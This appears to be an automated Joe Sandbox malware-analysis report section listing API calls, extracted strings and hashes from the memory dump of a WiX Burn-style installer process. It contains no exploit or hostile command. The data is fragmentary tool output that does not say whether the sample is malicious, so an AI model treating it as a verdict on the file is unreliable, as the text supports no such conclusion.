                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                • API String ID: 3480017824-1101990113
                                                                                                                • Opcode ID: c0edeba23fdd28e5ff4f67994c0ba2d0066f80cb42a7720e04bfd4f966639b2f
                                                                                                                • Instruction ID: b3ab60db19e1766858b7c12e97629145928b4caa1b32a1690a774b51b493f4d0
                                                                                                                • Opcode Fuzzy Hash: c0edeba23fdd28e5ff4f67994c0ba2d0066f80cb42a7720e04bfd4f966639b2f
                                                                                                                • Instruction Fuzzy Hash: A8716372D01239ABDB319FA9DC89BAEB7B8AB09710F1141D5FA04E7191D7349E809FD0
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,009A53BD,00000000,009A5489,009A5445,WixBundleUILevel,840F01E8,?,00000001), ref: 009ACC1C
                                                                                                                Strings
                                                                                                                • payload.cpp, xrefs: 009ACD1D
                                                                                                                • Failed to concat file paths., xrefs: 009ACCFC
                                                                                                                • Payload was not found in container: %ls, xrefs: 009ACD29
                                                                                                                • Failed to ensure directory exists, xrefs: 009ACCEE
                                                                                                                • Failed to find embedded payload: %ls, xrefs: 009ACC48
                                                                                                                • Failed to get next stream., xrefs: 009ACD03
                                                                                                                • Failed to extract file., xrefs: 009ACCE7
                                                                                                                • Failed to get directory portion of local file path, xrefs: 009ACCF5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                • API String ID: 1825529933-1711239286
                                                                                                                • Opcode ID: 3b9e1aebfc1e26f52a98775c52de6a077fa0ab19e29b344e9a1ae3c2054f4d3e
                                                                                                                • Instruction ID: ef9869d4f747b0607351d62a3aba48ecfb5298fef5ad1e21e44c7111aaf1257d
                                                                                                                • Opcode Fuzzy Hash: 3b9e1aebfc1e26f52a98775c52de6a077fa0ab19e29b344e9a1ae3c2054f4d3e
                                                                                                                • Instruction Fuzzy Hash: D141E7B1900219EBCF269F49CC41A6DBBB9FF82720F11856AE855AF391D7709D40DBD0
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 009A47BB
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 009A47C1
                                                                                                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009A484F
                                                                                                                Strings
                                                                                                                • wininet.dll, xrefs: 009A47EE
                                                                                                                • Failed to load UX., xrefs: 009A4804
                                                                                                                • engine.cpp, xrefs: 009A489B
                                                                                                                • Failed to create engine for UX., xrefs: 009A47DB
                                                                                                                • Unexpected return value from message pump., xrefs: 009A48A5
                                                                                                                • Failed to start bootstrapper application., xrefs: 009A481D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$CurrentPeekThread
                                                                                                                • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                • API String ID: 673430819-2573580774
                                                                                                                • Opcode ID: 783f3ca579646529087f1a2a04e02890b9254f70f0ed0872c848795716a95349
                                                                                                                • Instruction ID: 5b4424b487674152258476c153648b2b032793f3824f73cf197742c41f34ed79
                                                                                                                • Opcode Fuzzy Hash: 783f3ca579646529087f1a2a04e02890b9254f70f0ed0872c848795716a95349
                                                                                                                • Instruction Fuzzy Hash: C641D071A00195BFEB119BA8DC85FBBB3ACEF86324F100525F904E7290DB78AD0187E0
                                                                                                                APIs
                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,009CB03E,?,00000001,00000000), ref: 009C9D0F
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,009CB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 009C9D19
                                                                                                                • CopyFileExW.KERNEL32(00000000,00000000,009C9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 009C9D67
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,009CB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 009C9D96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$AttributesCopy
                                                                                                                • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                • API String ID: 1969131206-836986073
                                                                                                                • Opcode ID: ae65d58e8cd68447a634c2a19dde40362083dc78d10c87ef203cbde7850c6cef
                                                                                                                • Instruction ID: b84f510a534d903bd1a39407eb287537bbe43202e740fcb7963440daff2c9296
                                                                                                                • Opcode Fuzzy Hash: ae65d58e8cd68447a634c2a19dde40362083dc78d10c87ef203cbde7850c6cef
                                                                                                                • Instruction Fuzzy Hash: 80310672F41225B7DB209B968C49F7B77ACAF81B25B14815CBD19EF291D624CD00C7E2
                                                                                                                APIs
                                                                                                                • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 009B9007
                                                                                                                Strings
                                                                                                                • Failed to allocate access for Everyone group to path: %ls, xrefs: 009B8F51
                                                                                                                • Failed to allocate access for Administrators group to path: %ls, xrefs: 009B8F0F
                                                                                                                • Failed to allocate access for Users group to path: %ls, xrefs: 009B8F72
                                                                                                                • Failed to create ACL to secure cache path: %ls, xrefs: 009B8FBB
                                                                                                                • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 009B8F30
                                                                                                                • Failed to secure cache path: %ls, xrefs: 009B8FEA
                                                                                                                • cache.cpp, xrefs: 009B8FB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLocal
                                                                                                                • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                                                                • API String ID: 2826327444-4113288589
                                                                                                                • Opcode ID: 9feeac5f7d953cafc1162f9fae3ac08ad7508c5e077d3fd289ea2b90487f6963
                                                                                                                • Instruction ID: 5a58fd67a85636ae9b1976479ea5e6cd409e74f7c9a912dd08aadaae7db6d647
                                                                                                                • Opcode Fuzzy Hash: 9feeac5f7d953cafc1162f9fae3ac08ad7508c5e077d3fd289ea2b90487f6963
                                                                                                                • Instruction Fuzzy Hash: AF41D532A4432DB7DB2196548D06FFBB66DEB89B20F114064FB04BA181DF71AE44C7E1
                                                                                                                APIs
                                                                                                                • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 009B495A
                                                                                                                • GetLastError.KERNEL32 ref: 009B4967
                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 009B4A12
                                                                                                                • GetLastError.KERNEL32 ref: 009B4A1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastRead
                                                                                                                • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                                                                                • API String ID: 1948546556-773887359
                                                                                                                • Opcode ID: 0b405f228f847ecdb4199a568ae71528d1c041f1e7eef8f5178f1649c4e659ea
                                                                                                                • Instruction ID: 86a75ab49380a205e0067ec4e9ef38a6305ffa883ff6a007cd39d14b89ae73f4
                                                                                                                • Opcode Fuzzy Hash: 0b405f228f847ecdb4199a568ae71528d1c041f1e7eef8f5178f1649c4e659ea
                                                                                                                • Instruction Fuzzy Hash: 5131F532E84229ABDB209A958E45BFBB76CBB44B31F108125FD50A6142D7749D50ABD0
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 009E6C88
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 009E6CA5
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6CE3
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6D27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$CompareFree
                                                                                                                • String ID: `<u$email$name$uri
                                                                                                                • API String ID: 3589242889-1197142144
                                                                                                                • Opcode ID: 72d79d38923e29c43ede93e4925da576a54880eb2b9b845a1353f1c5594fa959
                                                                                                                • Instruction ID: 749d85f18bae0fb899a32996a0153a7f6c6d6c98de758beb11c3ddd89f4b2ad7
                                                                                                                • Opcode Fuzzy Hash: 72d79d38923e29c43ede93e4925da576a54880eb2b9b845a1353f1c5594fa959
                                                                                                                • Instruction Fuzzy Hash: B341AF31A05259BBCB129B95CD45FAEBB78EF14365F3042A4EA60AB1E1C7319E40DB50
                                                                                                                APIs
                                                                                                                • LoadBitmapW.USER32(?,00000001), ref: 009BE2E5
                                                                                                                • GetLastError.KERNEL32 ref: 009BE2F1
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 009BE338
                                                                                                                • GetCursorPos.USER32(?), ref: 009BE359
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 009BE36B
                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 009BE381
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                • API String ID: 2342928100-598475503
                                                                                                                • Opcode ID: ffb1137a2ae637e4dae8b1b7761191d8b8f824c8ed766b37a70d7d9035b77d1c
                                                                                                                • Instruction ID: 738615ecb3c6554a845d6259893556cbf6a7a9deef509030ffb6bb8cc3888660
                                                                                                                • Opcode Fuzzy Hash: ffb1137a2ae637e4dae8b1b7761191d8b8f824c8ed766b37a70d7d9035b77d1c
                                                                                                                • Instruction Fuzzy Hash: 04314175A01219AFDB10DFB9D989BDEBBF8EF08711F148115F904EB285DB70E9008BA0
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,?,?,009EB500), ref: 009B50D3
                                                                                                                • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 009B5171
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009B518A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCurrentHandle
                                                                                                                • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                • API String ID: 2815245435-1352204306
                                                                                                                • Opcode ID: 6afcbaaa417b574b42978629c0316bb7eabfcaf4d08a8fd0e959cd473c4a66e4
                                                                                                                • Instruction ID: 3731d7f74b16fcf9f02c5ae56a4a2e28e61b82c8519992f4e3fe06c920dd9958
                                                                                                                • Opcode Fuzzy Hash: 6afcbaaa417b574b42978629c0316bb7eabfcaf4d08a8fd0e959cd473c4a66e4
                                                                                                                • Instruction Fuzzy Hash: 53217A71D0460DBF8F129F98CD85AEEBBB8EF48364B11816AFA10A6211D7719E509B90
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 009A68AC
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009A68B3
                                                                                                                • GetLastError.KERNEL32 ref: 009A68BD
                                                                                                                Strings
                                                                                                                • Failed to set variant value., xrefs: 009A6929
                                                                                                                • msi, xrefs: 009A68A3
                                                                                                                • Failed to find DllGetVersion entry point in msi.dll., xrefs: 009A68EB
                                                                                                                • variable.cpp, xrefs: 009A68E1
                                                                                                                • Failed to get msi.dll version info., xrefs: 009A6905
                                                                                                                • DllGetVersion, xrefs: 009A689E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorHandleLastModuleProc
                                                                                                                • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                • API String ID: 4275029093-842451892
                                                                                                                • Opcode ID: d0abda12a6fd15d2c9604fd11c6c7a5943f817fa0e92e1771241c65346d41a55
                                                                                                                • Instruction ID: 1c3774cd9beda6172ef3578edb22d6794a699c59e70b84741e86c970743051db
                                                                                                                • Opcode Fuzzy Hash: d0abda12a6fd15d2c9604fd11c6c7a5943f817fa0e92e1771241c65346d41a55
                                                                                                                • Instruction Fuzzy Hash: 7F11DA72E41679B6D721ABBD8C42A7F7798AB85710F010519FE01FB181D6799C0082E1
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,009A47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,009A548E,?), ref: 009AD6DA
                                                                                                                • GetLastError.KERNEL32(?,009A47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,009A548E,?,?), ref: 009AD6E7
                                                                                                                • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 009AD71F
                                                                                                                • GetLastError.KERNEL32(?,009A47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,009A548E,?,?), ref: 009AD72B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                • API String ID: 1866314245-2276003667
                                                                                                                • Opcode ID: 2d94ad2c7dd6448190310ba2971360e42ee40bb1af50a85792e13efaf50a3e6a
                                                                                                                • Instruction ID: 74e4e6bf9243faef2f0d593f7298223a6f8341d1c5c0897c556d8266b9ae5d55
                                                                                                                • Opcode Fuzzy Hash: 2d94ad2c7dd6448190310ba2971360e42ee40bb1af50a85792e13efaf50a3e6a
                                                                                                                • Instruction Fuzzy Hash: E1113AB7A82772A7CB3646964C15F1B7A94BF46B21F014926FE12FB6C0DB20EC0086D0
                                                                                                                APIs
                                                                                                                • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A1186
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A1191
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009A119F
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A11BA
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009A11C2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A11D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                • API String ID: 3104334766-1824683568
                                                                                                                • Opcode ID: b3e0516ce1faae200286317241fcd7e8649f8dedd5398e841cc0428cce2a4f53
                                                                                                                • Instruction ID: 181a59a51a5cbe434fdd13c8ceb50157e347811c0c9bfde3cbd4ba9740648657
                                                                                                                • Opcode Fuzzy Hash: b3e0516ce1faae200286317241fcd7e8649f8dedd5398e841cc0428cce2a4f53
                                                                                                                • Instruction Fuzzy Hash: 2001B531208256BB9B116BA79C45D6F7B5CFB82765B004011FA1596150EB70EE01DBF0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009BF64E
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009BF7C9
                                                                                                                Strings
                                                                                                                • Failed to set download password., xrefs: 009BF777
                                                                                                                • UX did not provide container or payload id., xrefs: 009BF7B8
                                                                                                                • Engine is active, cannot change engine state., xrefs: 009BF668
                                                                                                                • UX requested unknown payload with id: %ls, xrefs: 009BF6A3
                                                                                                                • Failed to set download user., xrefs: 009BF751
                                                                                                                • Failed to set download URL., xrefs: 009BF728
                                                                                                                • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 009BF6B9
                                                                                                                • UX requested unknown container with id: %ls, xrefs: 009BF6F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                • API String ID: 3168844106-2615595102
                                                                                                                • Opcode ID: 201b4d80054cb45f9737bd03662e14f75d830d791e66c7e194019db31df9aa0e
                                                                                                                • Instruction ID: d69f3c0cbc3ae332b69a742def5acba327a9897973040b5dcf234b515422c459
                                                                                                                • Opcode Fuzzy Hash: 201b4d80054cb45f9737bd03662e14f75d830d791e66c7e194019db31df9aa0e
                                                                                                                • Instruction Fuzzy Hash: A541F67260461AEBCB219B24CD95FAAB3A8AF40730B1541B6F814EB251EF75DC40C791
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 009E5A9B
                                                                                                                • GetLastError.KERNEL32 ref: 009E5AA9
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 009E5AEA
                                                                                                                • GetLastError.KERNEL32 ref: 009E5AF7
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009E5C6A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009E5C79
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                • String ID: GET$dlutil.cpp
                                                                                                                • API String ID: 2028584396-3303425918
                                                                                                                • Opcode ID: d3469805e9894dca3423beffcb1e410ba0d706798dbe22e12d1f4ddf421b6429
                                                                                                                • Instruction ID: 8944c0a21f5e5f660ea55b7d9de759382c5873dc6efb4bd59da6977995eb4a52
                                                                                                                • Opcode Fuzzy Hash: d3469805e9894dca3423beffcb1e410ba0d706798dbe22e12d1f4ddf421b6429
